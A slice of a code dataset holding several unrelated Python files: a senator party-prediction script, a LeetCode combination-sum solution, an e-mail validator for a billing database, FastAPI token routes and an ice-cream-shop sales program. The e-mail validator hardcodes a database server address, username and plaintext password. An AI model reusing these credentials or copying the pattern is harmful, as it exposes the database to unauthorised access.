page = wikipedia.page(senator)\r\n pages_R.append(page.content)\r\n print(senator)\r\nprint('')\r\n\r\nprint('Downloading Democrat senator data...')\r\npages_D = []\r\nfor senator in democrats.iloc[:, 0]:\r\n page = wikipedia.page(senator)\r\n pages_D.append(page.content)\r\n print(senator)\r\nprint('')\r\n\r\n###############################################################\r\n\r\n# Create a dataset containing each Republican senator's name and their respective article\r\ndataset_R = []\r\nfor i in range(0, len(republicans)):\r\n dataset_R.append([republicans.iloc[i][0], pages_R[i]])\r\n \r\ndataset_R = pd.DataFrame(dataset_R, columns = ['Senator Name', 'Article'])\r\n\r\n# Calculate the number of instances of the word \"Republican\" and \"Democrat\" in the article to predict which political party a Republican senator is in\r\n# Also count variations in those words, such as \"republicans\", \"democrats\", and \"democratic\"\r\n# The entire article was converted to lowercase in order to avoid case-sensitivity (e.g. otherwise, \"republican\" and \"Republican\" would be considered two different words)\r\ncounts_R = []\r\ncounts_D = []\r\nfor i in range(0, len(republicans)):\r\n article = dataset_R.iloc[i][1]\r\n tokenizer = RegexpTokenizer(r'\\w+')\r\n article_words = []\r\n for word in tokenizer.tokenize(article):\r\n article_words.append(word.lower())\r\n counts_R.append(article_words.count('republican') + article_words.count('republicans'))\r\n counts_D.append(article_words.count('democrat') + article_words.count('democrats') + article_words.count('democratic'))\r\n\r\n# Add the word counts to the dataset\r\ndataset_R[\"# of 'Republican'\"] = counts_R\r\ndataset_R[\"# of 'Democrat'\"] = counts_D\r\n \r\n# Since the words in the articles have already been counted, the articles themselves are no longer necessary, and so they can be deleted\r\ndataset_R = dataset_R.drop(columns = 'Article')\r\n\r\n###############################################################\r\n\r\n# Create a dataset containing each Democrat senator's name and their respective article\r\ndataset_D = []\r\nfor i in range(0, len(democrats)):\r\n dataset_D.append([democrats.iloc[i][0], pages_D[i]])\r\n \r\ndataset_D = pd.DataFrame(dataset_D, columns = ['Senator Name', 'Article'])\r\n\r\n# Calculate the number of instances of the word \"Republican\" and \"Democrat\" in the article to predict which political party a senator is in\r\n# Also count variations in those words, such as \"republicans\", \"democrats\", and \"democratic\"\r\n# The entire article was converted to lowercase in order to avoid case-sensitivity (e.g. 
otherwise, \"republican\" and \"Republican\" would be considered two different words)\r\ncounts_R = []\r\ncounts_D = []\r\nfor i in range(0, len(democrats)):\r\n article = dataset_D.iloc[i][1]\r\n tokenizer = RegexpTokenizer(r'\\w+')\r\n article_words = []\r\n for word in tokenizer.tokenize(article):\r\n article_words.append(word.lower())\r\n counts_R.append(article_words.count('republican') + article_words.count('republicans'))\r\n counts_D.append(article_words.count('democrat') + article_words.count('democrats') + article_words.count('democratic'))\r\n\r\n# Add the word counts to the dataset\r\ndataset_D[\"# of 'Republican'\"] = counts_R\r\ndataset_D[\"# of 'Democrat'\"] = counts_D\r\n\r\n# Since the words in the articles have already been counted, the articles themselves are no longer necessary, and so they can be deleted\r\ndataset_D = dataset_D.drop(columns = 'Article')\r\n\r\n###############################################################\r\n\r\n# This is essentially a machine learning classification model\r\n# Predict each senator's political party based on how frequent the words \"Republican\" and \"Democrat\" (including their variations) appear in the code.\r\n# If \"Republican\" appears more frequently than \"Democrat\", the party is predicted as Republican, and vice versa\r\n# If both words are equally frequent, the senator's political party cannot be determined, and thus in that case, the model returns NaN\r\n\r\n# Make predictions for Republican senators\r\npredicted_R = []\r\nfor i in range(0, len(dataset_R)):\r\n if dataset_R.iloc[i][1] > dataset_R.iloc[i][2]:\r\n predicted_R.append('Republican')\r\n elif dataset_R.iloc[i][1] == dataset_R.iloc[i][2]:\r\n predicted_R.append(np.nan)\r\n else:\r\n predicted_R.append('Democrat')\r\n\r\n# Add the predicted parties to the dataset\r\ndataset_R['Predicted Party'] = predicted_R\r\n\r\n# Make predictions for Democrat senators\r\npredicted_D = []\r\nfor i in range(0, len(dataset_D)):\r\n if dataset_D.iloc[i][1] > dataset_D.iloc[i][2]:\r\n predicted_D.append('Republican')\r\n elif dataset_D.iloc[i][1] == dataset_D.iloc[i][2]:\r\n predicted_D.append(np.nan)\r\n else:\r\n predicted_D.append('Democrat')\r\n\r\n# Add the predicted parties to the dataset\r\ndataset_D['Predicted Party'] = predicted_D\r\n\r\n# Count the number of true and false political party predictions\r\n# pred_DD represents the number of senators that are actually Democrats and were predicted to be Democrats (correct result)\r\n# pred_DR represents the number of senators that are actually Democrats and were predicted to be Republicans (false prediction)\r\n# pred_RD represents the number of senators that are actually Republicans and were predicted to be Democrats (false prediction)\r\n# pred_RR represents the number of senators that are actually Republicans and were predicted to be Republicans (correct result)\r\n\r\npred_DD = 0\r\npred_DR = 0\r\npred_RD = 0\r\npred_RR = 0\r\n\r\nfor entry in dataset_D['Predicted Party']:\r\n if entry == 'Democrat':\r\n pred_DD += 1\r\n elif entry == 'Republican':\r\n pred_DR += 1\r\n\r\nfor entry in dataset_R['Predicted Party']:\r\n if entry == 'Democrat':\r\n pred_RD += 1\r\n elif entry == 'Republican':\r\n pred_RR += 1\r\n\r\n# Create a confusion matrix, which shows the distribution of true and false predictions, and compute the overall accuracy rate of the model\r\n\r\nconfusion_matrix = np.matrix([[pred_DD, pred_DR], [pred_RD, pred_RR]])\r\nsuccess = (pred_DD + pred_RR) / (pred_DD + pred_DR + pred_RD + pred_RR) * 
100\r\nprint(confusion_matrix)\r\nprint('')\r\nprint('Prediction Success: ' + str(round(success, 2)) + '%')\r\n\r\n###############################################################\r\n\r\n# Create a scatterplot of the results\r\n# Points show true predictions, and Xs show false predictions\r\n\r\nplt.figure()\r\n# Actual democrats, predicted democrats\r\nplt.scatter(dataset_D[\"# of 'Republican'\"][dataset_D['Predicted Party'] == 'Democrat'], dataset_D[\"# of 'Democrat'\"][dataset_D['Predicted Party'] == 'Democrat'], c = 'blue', marker = '.')\r\n\r\n# Actual democrats, predicted republicans\r\nplt.scatter(dataset_D[\"# of 'Republican'\"][dataset_D['Predicted Party'] == 'Republican'], dataset_D[\"# of 'Democrat'\"][dataset_D['Predicted Party'] == 'Republican'], c = 'blue', marker = 'X')\r\n\r\n# Actual republicans, predicted democrats\r\nplt.scatter(dataset_R[\"# of 'Republican'\"][dataset_R['Predicted Party'] == 'Democrat'], dataset_R[\"# of 'Democrat'\"][dataset_R['Predicted Party'] == 'Democrat'], c = 'red', marker = 'X')\r\n\r\n# Actual republicans, predicted republicans\r\nplt.scatter(dataset_R[\"# of 'Republican'\"][dataset_R['Predicted Party'] == 'Republican'], dataset_R[\"# of 'Democrat'\"][dataset_R['Predicted Party'] == 'Republican'], c = 'red', marker = '.') \r\n\r\nplt.xlabel('# of Instances of \"Republican\"')\r\nplt.ylabel('# of Instances of \"Democrat\"')\r\nplt.title(\"Predicting a Senator's Political Party Based on Word Frequency\")","repo_name":"adeet1/hc-node","sub_path":"projects/web-scraping/political-party-prediction.py","file_name":"political-party-prediction.py","file_ext":"py","file_size_in_byte":8472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29497373106","text":"'''\n给定一个无重复元素的数组 candidates 和一个目标数 target ,找出 candidates 中所有可以使数字和为 target 的组合。\n\ncandidates 中的数字可以无限制重复被选取。\n\n说明:\n\n所有数字(包括 target)都是正整数。\n解集不能包含重复的组合。 \n示例 1:\n\n输入: candidates = [2,3,6,7], target = 7,\n所求解集为:\n[\n [7],\n [2,2,3]\n]\n示例 2:\n\n输入: candidates = [2,3,5], target = 8,\n所求解集为:\n[\n  [2,2,2,2],\n  [2,3,3],\n  [3,5]\n]\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/combination-sum\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\n\nclass Solution:\n def combinationSum_1(self, candidates: [int], target: int) -> [[int]]:\n #未剪枝\n def backtrack(nums, path, tar):\n if sum(path) > tar:\n return\n elif sum(path) == tar:\n res.append(path[:])\n return\n for i in range(len(nums)):\n path.append(nums[i])\n backtrack(nums[i:], path, tar)\n path.pop()\n\n nums = candidates\n res = []\n tar = target\n backtrack(nums, [], tar)\n\n return res\n\n def combinationSum_2(self, candidates: [int], target: int) -> [[int]]:\n #剪枝,加速\n def backtrack(i, path, tar):\n if tar == 0:\n res.append(path[:])\n return\n for j in range(i,len(nums)):\n #利用变量tar纪录每次选择前的差量,来判断选择与否\n if tar - nums[j] >= 0:\n path.append(nums[j])\n backtrack(j, path, tar - nums[j])\n path.pop()\n\n nums = candidates\n res = []\n tar = target\n backtrack(0, [], tar)\n\n return res\n\n#测试\ncandidates = [2,3,5]\ntarget = 8\n\nres = Solution().combinationSum_2(candidates,target)\nprint(res)\n\n","repo_name":"Da1anna/Data-Structed-and-Algorithm_python","sub_path":"leetcode/其它题型/回溯/组合总和.py","file_name":"组合总和.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37821814995","text":"import pandas as pd\nimport pymssql as psq\nimport psycopg2.extras\nfrom email_validate import validate, 
validate_or_fail\nimport email_validate.exceptions as eex\nimport time\nfrom progress.bar import IncrementalBar\n\n# Соединяемся с базой стека\nmes_conn = psq.connect(server='192.168.9.10', user='LUBCHANSKIY', password='789456', database='Magadan_stack', charset='utf8')\n\n# Функция запроса е-маил физиков\ndef email_fizlic(s_conn):\n cursor = s_conn.cursor()\n sql_srting = \"SELECT лс.Номер лицевой, св.Примечание email FROM stack.Свойства св join stack.[Лицевые счета] лс ON лс.ROW_ID = св.[Счет-Параметры] where [Виды-Параметры]=177\"\n cursor.execute(sql_srting)\n row = cursor.fetchone()\n data = []\n while row:\n data.append([row[0], row[1].encode('windows-1251').decode()])\n row = cursor.fetchone() \n return data\n\n# Функция запроса е-маил юриков\ndef email_ulorg(s_conn):\n cursor = s_conn.cursor()\n cursor.execute(\"SELECT Название, орг.email FROM stack.[Организации] орг where email is not null and email != ''\")\n row = cursor.fetchone()\n data = []\n while row:\n data.append([row[0].encode('ISO-8859-1').decode('windows-1251'), row[1]]) # Перекодируем строчку со странной кодировкой принятой с БД\n row = cursor.fetchone() \n return data\n\n# Запрашиваем таблички e-mail физиков и юриков\nfiz_email_list = email_fizlic(mes_conn)\nul_email_list = email_ulorg(mes_conn)\n\n# Функция проверки e-mail адресов\ndef valid_email(email):\n try:\n validate_or_fail(\n email_address=email,\n check_format=True,\n check_blacklist=False,\n check_dns=True,\n dns_timeout=10,\n check_smtp=True,\n smtp_debug=False\n )\n except eex.DomainNotFoundError:\n return 'Адрес домена не найден'\n except eex.NoNameserverError:\n return '' # Почему то ругается на многие нормальные адреса, поэтому отключил\n except eex.DNSTimeoutError:\n return 'Истекло время ожидания при запросе сервера имен.'\n except eex.DNSConfigurationError:\n return 'Сервер имен настроен неправильно.'\n except eex.NoMXError:\n return 'Сервер имен не содержит записей MX для домена.'\n except eex.NoValidMXError:\n return 'Сервер имен перечисляет записи MX для домена, но ни одна из них не является допустимой.'\n except eex.AddressFormatError:\n return 'Формат адреса не соответствует требованиям'\n except eex.DomainBlacklistedError:\n return 'Адрес домена в черном списке!'\n except eex.SMTPError:\n return 'Ошибка доставки по адресу, адрес не существует'\n else:\n return ''\n \n\n# Проверяем физиков\nemail_errors = []\nbar = IncrementalBar('Countdown', max = len(fiz_email_list))\nfor email_ls in fiz_email_list:\n res = valid_email(email_ls[1])\n if res != '':\n email_errors.append([email_ls[0], email_ls[1], res])\n bar.next()\nbar.finish()\nemail_df = pd.DataFrame(email_errors)\n\n\n# Проверяем юриков\nul_email_errors = []\nbar = IncrementalBar('Countdown', max = len(ul_email_list))\nfor email_ls in ul_email_list:\n if ';' in email_ls[1]:\n spl_res = email_ls[1].split(';')\n for eml in spl_res:\n res = valid_email(eml)\n if res != '':\n ul_email_errors.append([email_ls[0], eml, res])\n elif ',' in email_ls[1]:\n spl_res = email_ls[1].split(',')\n for eml in spl_res:\n res = valid_email(eml)\n if res != '':\n ul_email_errors.append([email_ls[0], eml, res])\n else:\n res = valid_email(email_ls[1])\n if res != '':\n ul_email_errors.append([email_ls[0], email_ls[1], res])\n bar.next()\nbar.finish() \nulemail_df = pd.DataFrame(ul_email_errors)\n\n# Запихиваем все в Excel\nsh_name_fl = 'Ошибки физиков'\nsh_name_ul = 'Ошибки юриков'\nwriter = pd.ExcelWriter('email_error.xlsx', engine='xlsxwriter')\n\nemail_df.to_excel(writer, sheet_name=sh_name_fl, 
index=False)\nulemail_df.to_excel(writer, sheet_name=sh_name_ul, index=False)\n\nwriter.save()\nwriter.close()\n\n","repo_name":"VRaptor555/my-apps","sub_path":"mes/email_valid.py","file_name":"email_valid.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23012178703","text":"from responses.standard_response_body import StandardResponseBody\nfrom tokens import controllers as token_controllers\n\n\nasync def validate_token(token):\n return StandardResponseBody(\n True, \"Valid token\", token.token_value\n )\n\n\n\nasync def refresh_token(token):\n res = await token_controllers.refresh_token_by_token(token)\n #print(res)\n if res:\n return StandardResponseBody(\n True, \"Token refreshed\", res.token_value\n )\n return StandardResponseBody(\n False, \"Token not refreshed\"\n )","repo_name":"jaisal1311/fastapi-dev","sub_path":"tokens/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73430000720","text":"# chamar pedido\nimport time\n\n\n\n# ganhar desconto\nfrom selenium.webdriver.common.alert import Alert\n\n\ndef ganhardesconto(d):\n limpar()\n nomeupper = ''\n escrever('GANHAR DESCONTO [1]SIM [2]NÃO')\n desconto = int(input(''))\n cpflimpo = ' '\n ddd = 1\n tel = 1\n if desconto == 2:\n return novopedido(nomeupper, cpflimpo, ddd, tel)\n\n if desconto == 1:\n limpar()\n nomec = ''\n while len(nomec) < 3:\n escrever('NOME: ')\n nomec = input('')\n\n # upper\n nomeupper = nomec.upper()\n\n cpflimpo = \"\"\n while (len(cpflimpo) < 10) or len(cpflimpo) > 11:\n escrever('CPF:')\n cpflimpo = str(input(''))\n\n if len(cpflimpo) == 10:\n cpflimpo = \"0\" + cpflimpo\n\n ddd = \"\"\n while len(ddd) != 2:\n escrever('DDD:')\n ddd = str(input(''))\n\n tel = \"\"\n while len(tel) != 9:\n escrever('TELEFONE:')\n tel = str(input(''))\n\n # importar data\n from datetime import datetime\n now = datetime.now()\n\n # conctenar minutus horas dia mes ano\n data = (str(now.minute) + \":\" + str(now.hour) + \";\" + str(now.day) + \"/\" + str(now.month) + \"/\" + str(now.year))\n\n # linha para salvar\n linhacliente = (cpflimpo + \";\" + nomeupper + \";\" + ddd + \";\" + tel + \";\" + data + \"\\n\")\n\n # abrir ou criar arquivo\n arquivo = open('cliente.csv', 'a',encoding=\"utf8\", newline=\"\")\n\n # escrever linha\n arquivo.write(\"%s\" % linhacliente)\n\n # fechar\n arquivo.close()\n\n novopedido(nomeupper,cpflimpo, ddd, tel)\n\n if desconto == 2:\n limpar()\n return novopedido(1)\n\n\n\n\ndef desconto_para_clientes_cadastrados(cpflimpo, total):\n if len(cpflimpo) >= 10:\n descontototal = total / 20# cinco % de desconto\n return descontototal\n else:\n return 0\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#pedido na tela\ndef chamarpedido(d):\n limpar()\n escrever('digite O PEDIDO: ')\n chamarpedido = int(input(''))\n limpar()\n escrever(str(chamarpedido))\n escrever(str(chamarpedido) + ' CONCLUIDO [1] CANCELAR [0]')\n opchamar = 1\n opchamar = str(input(''))\n if opchamar == '0':\n return menu()\n\n return pedidotela(str(chamarpedido))\n\n# chamar pedido com musica\ndef pedidotela(texto):\n limpar()\n\n import pygame\n pygame.init()\n limpar()\n pygame.mixer.music.load('ex01.mp3')\n limpar()\n pygame.mixer.music.play()\n # pygame.event.wait()\n limpar()\n tamanhotexto = len(texto) + 20\n print('#' * tamanhotexto)\n print(\" \" * 10, texto)\n print('#' * tamanhotexto)\n import time\n 
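    # pygame.mixer.music.play() returns immediately (playback is asynchronous),
    # so the sleep below keeps the order number on screen while the sound plays.
    # This local "import time" also duplicates the module-level import at the top.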
time.sleep(5)\n\n# limpar tela\ndef limpar():\n return print(\"\\n\" * 100)\n\n# novo pedido\ndef novopedido(nome,cpflimpo, ddd, tel):\n limpar()\n\n # mais um comvalor 1 para fazer o primeiro pedido\n maisum = 1\n\n total = 0\n\n if len(nome) < 1:\n nomeok = 0\n while nomeok == 0:\n escrever(\"NOME DO CLIENTE: \")\n nomeup = input(\"\")\n nome = nomeup.upper()\n limpar()\n escrever(nome)\n escrever('CONTINUAR [1]')\n escrever('ALTERAR NOME? [0]')\n opnome = int(input(''))\n limpar()\n if opnome == 1:\n nomeok = 1\n\n\n\n dic={}\n lista=list()\n # mais um com o valor 1 para iniciar\n maisum = 1\n while maisum == 1:\n\n if len(str(lista)) > 2:\n\n print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')\n print('JÁ ADICIONADO ')\n\n for add in lista:\n minhalinha = ''\n add.split(';')\n for um in add:\n minhalinha = minhalinha+str(um)\n\n\n\n remover =', )\\', ( '\n for i in range(0, len(remover)):\n minhalinha = minhalinha.replace(remover[i], '')\n\n minhalinha = minhalinha.replace('|||', '')\n minhalinha = minhalinha.replace('||', '')\n minhalinha = minhalinha.replace('|', ' | ')\n\n print(minhalinha)\n\n print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')\n\n\n # ecolher sabor\n SABOR = addproduto(1)\n\n\n\n #escrever(\"SABORES: \\n [1] CHOCOLATE \\n [2] MISTO \\n [3] CREME\\n [4] triplo chocolate Kopenhagen\\n [5] Kit Kat\")\n\n # quantidade de sorvetes reverente ao sabo\n QTDO = 1\n escrever(\"QUANTIDADE: \")\n QTDO = (int(input(\"\")))\n \n\n\n\n\n\n\n\n\n # cobertura extra só por categoria/grupo de produtos\n #######################################################\n\n # cobertura extra\n #escrever('COBERTURA EXTRA [1] SIM [2] NÃO')\n #coberturaextra=int(input(''))\n #if coberturaextra == 1:\n # total = total + 2 # mais 2 reais de cobertura extra\n # #abrirfoto('e')\n # extra = ' COM COBERTURA EXTRA'\n\n #else:\n # extra = 'SEM COBERTURA EXTRA'\n extra = ''\n\n\n # cobertura extra só por categoria/grupo de produtos\n #######################################################\n\n\n\n\n\n\n # preço total do pedido\n descontodef = calcularprecototal(QTDO, SABOR)\n total = total + descontodef\n linhadoproduto = str(SABOR)\n valorli = linhadoproduto.split('|')\n valorreal = float(valorli[1])\n valorreal = QTDO * valorreal\n total = total + valorreal\n\n\n\n\n\n\n\n\n\n\n # lista de sabor e quantidade\n um = str(QTDO)\n lista.append(\"|| {} | {} | {} ||\".format(str(um), str(SABOR), str(extra)))\n\n\n\n\n # limpar tela\n limpar()\n\n\n\n # mostrar na tela os ja add\n if len(str(lista)) > 2:\n print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')\n print('JÁ ADICIONADO ')\n\n\n\n for add in lista:\n minhalinha = ''\n add.split(';')\n for um in add:\n minhalinha = minhalinha+str(um)\n\n remover = ', )\\', ( '\n for i in range(0, len(remover)):\n minhalinha = minhalinha.replace(remover[i], '')\n\n minhalinha = minhalinha.replace('|||', '')\n minhalinha = minhalinha.replace('||', '')\n minhalinha = minhalinha.replace('|', ' | ')\n minhalinha = minhalinha.replace(' | ', '?')\n minhalinha = minhalinha.replace('|', '')\n minhalinha = minhalinha.replace('?', ' | ')\n print(minhalinha)\n #print('\\n')\n #print('TOTAL: '+str(total))\n print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')\n\n\n\n\n escrever(\"mais um [1]\")\n escrever(\"finalizar [2]\")\n maisum = int(input(''))\n\n\n if maisum == 2:\n maisum = 0\n\n # limpar tela\n limpar()\n\n\n\n\n\n\n\n\n\n # importar data\n from datetime import datetime\n\n # agora\n now = datetime.now()\n\n # conctenar minutus 
horas dia mes ano\n horahora = str(now.hour)\n if len(horahora)<2:\n horahora ='0'+str(now.hour)\n\n minutominuto=str(now.minute)\n if len(minutominuto)<2:\n minutominuto ='0'+str(now.minute)\n\n\n data = (horahora + \":\" + minutominuto + \";\" + str(now.day) + \"/\" + str(now.month) + \"/\" + str(now.year))\n\n\n # mostrar o pedido completo para o usuario para confirmar pedido/venda\n\n m = int(now.minute)\n h = int(now.hour)\n d = int(now.day)\n me = int(now.month)\n an = int(now.year)\n numeropedidovariavel = str(numeropedido(m, h, d, me, an))\n escrever('NOME: ' + nome)\n listalinha = str(lista)\n listalinha=listalinha.replace(' ','')\n listalinha=listalinha.replace(']','')\n listalinha=listalinha.replace('[','')\n listalinha=listalinha.replace('\\\"','')\n listalinha=listalinha.replace('||','')\n listalinha=listalinha.replace('|','?')\n listalinha=listalinha.replace(',','')\n\n listalinha=listalinha.replace('(','')\n listalinha=listalinha.replace('\\'','')\n listalinha = listalinha.replace(')', '\\n')\n listalinha = listalinha.replace(' | ', '?')\n listalinha = listalinha.replace('|', '')\n listalinha = listalinha.replace('?', ' | ')\n \n\n\n\n\n subtotal = total\n descontodefcpf = desconto_para_clientes_cadastrados(cpflimpo, total)\n total = total-descontodefcpf\n\n\n\n\n\n print('PEDIDO')\n escrever(str(listalinha))\n escrever('SUBTOTAL: R$ ' + str(\"%.2f\" % subtotal))\n escrever('DESCONTO: R$ ' + str(\"%.2f\" % descontodefcpf))\n escrever('TOTAL: R$ ' + str(\"%.2f\" % total))\n\n\n\n escrever(str())\n\n\n\n # conferir se esta correto\n opfinal = '1'\n escrever(\"CONTINUAR [ENTER] CANCELAR [0]\")\n opfinal = input(\"\")\n\n if opfinal == \"\":\n opfinal = '1'\n if opfinal == '0':\n menu()\n\n # limpar tela\n limpar()\n\n\n # escrever na tela\n escrever('PEDIDO: '+numeropedidovariavel+' SALVO!')\n\n\n # espera\n time.sleep(1)\n\n\n\n # ferificar cpf\n if len(cpflimpo) < 3:\n cpflimpo = 'SEM CPF'\n\n\n\n pedidoitem = ''\n\n\n for item in lista:\n pedidoitem = pedidoitem + str(item)\n\n\n\n tsub=str(subtotal)\n tdesc=str(descontodefcpf)\n ttotal=str(total)\n\n\n\n\n\n # linha para salvar em arquivo\n linha = (\"p\"+numeropedidovariavel +';'+str(cpflimpo)+';'+ nome +';' + data + ';'+str(tsub)+ ';' +str(tdesc)+ ';' +str(ttotal) + \"\\n\")\n\n\n\n # abrir ou criar arquivo\n arquivo = open('pedidosimples.csv', 'a', newline=\"\", encoding=\"utf8\")\n\n # escrever linha\n arquivo.write(\"%s\" % linha)\n\n # fechar\n arquivo.close()\n\n\n\n # chamar pdf\n gerarpdfdetalhado(nome, numeropedidovariavel, lista,tsub, tdesc,total, data, ddd, tel)\n\n\n\n\n # string da lista\n listavariavel = str(lista)\n\n\n cpf = str(cpflimpo)\n\n\n \n # SUBSTITUIR UM SPAÇO | POR NUMERO DO PEDIDO\n # remover os caracteres da string\n\n\n\n remover = \"123456789\"\n for i in range(0, len(remover)):\n for x in range(0, 10, 1):\n strremove = str(i)+(' ')\n listavariavel = listavariavel.replace(strremove,'p' + str(numeropedidovariavel) + '|' + str(cpf) +'|' +str(QTDO))\n strremove = str(i)+str(x)+' '\n listavariavel = listavariavel.replace(strremove,'p'+str(numeropedidovariavel) + '|' + str(cpf) +'|'+ str(QTDO))\n\n # | POR ESPAÇO E SIRGULA POR ESPAÇO\n remover = \",\"\n for i in range(0, len(remover)):\n listavariavel = listavariavel.replace(remover[i], \"\")\n\n # remover os caracteres da string\n remover = \"\\'\\\"][,)( \"\n for i in range(0, len(remover)):\n listavariavel = listavariavel.replace(remover[i], \"\")\n\n # remover os caracteres da string\n remover = \"||||\"\n listavariavel = 
listavariavel.replace(remover, \"\\n\")\n\n # remover os caracteres da string\n remover = \"||\"\n listavariavel = listavariavel.replace(remover, \"\")\n\n\n # pular linha \n listavariavel = '\\n'+listavariavel\n\n # remover os caracteres da string\n remover = \"|p\"\n listavariavel = listavariavel.replace(remover, \"p\")\n\n # remover os caracteres da string\n remover = \"|\"\n listavariavel = listavariavel.replace(remover,\";\")\n\n\n # abrir ou criar arquivo\n arquivo = open('pedidosdetalhe.csv', 'a',encoding=\"utf8\", newline=\"\")\n\n # escrever linha\n arquivo.write(\"%s\" % str(listavariavel))\n\n # fechar\n arquivo.close()\n\n\n\n\n\n\n\n\n\n\n # gerar relatorio de produtos mais vendidos\n #maisvendido(listavariavel)\n\n #criarhtml(str(numeropedido))\n\n\n\n# gerar relatorio de mais vendidos / produtos mais vendidos\ndef venda_por_produto(n):\n \n import io\n import codecs\n\n arq = open('pedidosdetalhe.csv', 'r', encoding=\"utf8\")\n texto = arq.read()\n\n arq.close()\n\n dic = dict()\n\n texto = texto.replace('nome_produto', \"\")\n # remove letra misnusculas, numeros, espaços, #,#\n b = \",1234567890a b c d e f g h i j k l m n o p q r s t u v w x y z \\n :\"\n for i in range(0, len(b)):\n texto = texto.replace(b[i], \"\")\n\n\n # remover textos especiais\n texto = texto.replace('SEMCPF', \"\")\n texto = texto.replace('p', \"\")\n texto = texto.replace('LIVRE', \"\")\n texto = texto.replace('COMCOBERTURAEXTRA', \"\")\n texto = texto.replace('SEMCOBERTURAEXTRA', \"\")\n texto = texto.replace(\"\",'')\n\n\n # separar texto\n listfile = texto.split(';')\n listfile2 = listfile\n\n\n\n for item in listfile:\n Contitem = 0\n for i in listfile2:\n if item == i:\n Contitem = Contitem + 1\n dic[i] = Contitem\n\n\n\n # excluir dic P e DIC ''\n dic['P'] = 1\n del dic['P']\n del dic['']\n\n\n # str do dic em uma variavel\n textodic = str(dic)\n\n\n # remover caracteres\n b = '\\'}{ '\n for i in range(0, len(b)):\n textodic = textodic.replace(b[i], \"\")\n\n\n\n textodic = textodic.replace(',', \"\\n\")\n\n\n escrever('PRODUTO | QUANTIDADE \\n'+textodic)\n continua= input('ENTER PARA CONTINUAR')\n return menu()\n\n\n# html na tela\ndef criarhtml(numero):\n pedido = str(numero)\n # linha para salvar\n html = '<!DOCTYPE html>\\n<html>\\n<head>\\n<title>'+str(pedido)+'\\n\\n\\n
</title>\\n</head>\\n<body>\\n<h1>'+str(pedido)+'</h1>\\n<p>'+str(pedido)+'</p>\\n</body>\\n</html>
\\n\\n'\n\n # abrir ou criar arquivo\n arquivo = open('index.html', 'a', encoding=\"utf8\")\n\n # escrever linha\n arquivo.write(\"%s\" % html)\n\n # fechar\n arquivo.close()\n\n #abrirfoto('h')\n\n# abrir foto no webbrowser\ndef abrirfoto(numero):\n import webbrowser\n new = 2;\n\n\n\n # [1] CHOCOLATE\n if numero == 1:\n url = \"https://uploads.metropoles.com/wp-content/uploads/2018/03/22161224/kopenhagen1.jpg\"\n # [2] MISTO\n if numero == 2:\n url = \"https://uploads.metropoles.com/wp-content/uploads/2018/03/22161224/kopenhagen1.jpg\"\n # [3] CREME\n if numero == 3:\n url = \"https://uploads.metropoles.com/wp-content/uploads/2018/03/22161224/kopenhagen1.jpg\"\n # [4] triplo chocolate Kopenhagen\n if numero == 4:\n url = \"https://uploads.metropoles.com/wp-content/uploads/2018/03/22161224/kopenhagen1.jpg\"\n # [5] Kit Kat\n if numero == 5:\n url = \"http://s3.id5.com.br/maceioshopping/uploads/2016/07/McFlurryKitKat.jpg\"\n\n # [e] extra\n if numero == 'e':\n url=\"http://caramelodrama.com/wp-content/uploads/2018/01/melting-choc-istock.jpg\"\n\n # [e] extra\n if numero == 'h':\n url = \"file:///home/breno/BRENO/programacao/python/PROJETO%20SORVETERIA/index.html\"\n\n\n webbrowser.open(url, new=new)\n time.sleep(2)\n\n# gerar preço total\ndef calcularprecototal(QTDO, SABOR):\n CONTA = float(0)\n if SABOR == 1: # cho 3rs\n CONTA = float(QTDO * 3.5)\n escrever('preço 3,50')\n if SABOR == 2: # mis 4rs\n CONTA = float(QTDO * 4)\n escrever('preço 4,00')\n if SABOR == 3: # cre 5rs\n CONTA = float(QTDO * 4.5)\n escrever('preço 4,50')\n\n if SABOR == 4: # cre 5rs\n CONTA = float(QTDO * 8.5)\n escrever('preço 8,50')\n\n if SABOR == 5: # cre 5rs\n CONTA = float(QTDO * 9.0)\n escrever('preço 9,00')\n\n return CONTA\n\n# escrever texto\ndef escrever(texto):\n texto= str(texto)\n tamanhotexto = len(texto) + 4\n nomecaixa = texto.upper()\n print('~' * tamanhotexto)\n print(\" \", nomecaixa)\n print('~' * tamanhotexto)\n\n# sair do sistema\ndef sair(d):\n # limpar\n limpar()\n menu()\n\n# gerar numero do pedido\ndef numeropedido(m, h, d, me, an):\n numero = (h + d + me + an) * m\n pedido = str(numero)\n escrever('PEDIDO: ' + pedido)\n return pedido\n\n# inicio do programa\ndef menu():\n limpar()\n op = \"\"\n while op == \"\":\n limpar()\n escrever(\"NOVA VENDA [1]\")\n escrever(\"PEDIDO FEITO [2]\")\n escrever(\"PRODUTOS [3]\")\n escrever(\"relatorios [4]\")\n op = str(input(''))\n if op == \"1\" or op == \"2\" or op == \"3\" or op == \"4\":\n if op == \"2\":\n return chamarpedido(1)\n if op == \"1\":\n return ganhardesconto(1)\n if op == \"3\":\n return produto(1)\n if op == \"4\":\n return venda_por_produto(1)\n else:\n op == \"\"\n\n# tela produto\ndef produto(p):\n limpar()\n\n escrever(\"CADASTRAR PRODUTO [1]\")\n escrever(\"EXCLUIR PRODUTO [2]\")\n escrever(\"VOLTAR [3]\")\n op = str(input(''))\n if op == \"1\" or op == \"2\" or op == \"3\":\n if op == \"1\":\n return cadastrarproduto(1)\n if op == \"2\":\n return excluirproduto(1)\n if op == \"3\":\n return menu()\n else:\n 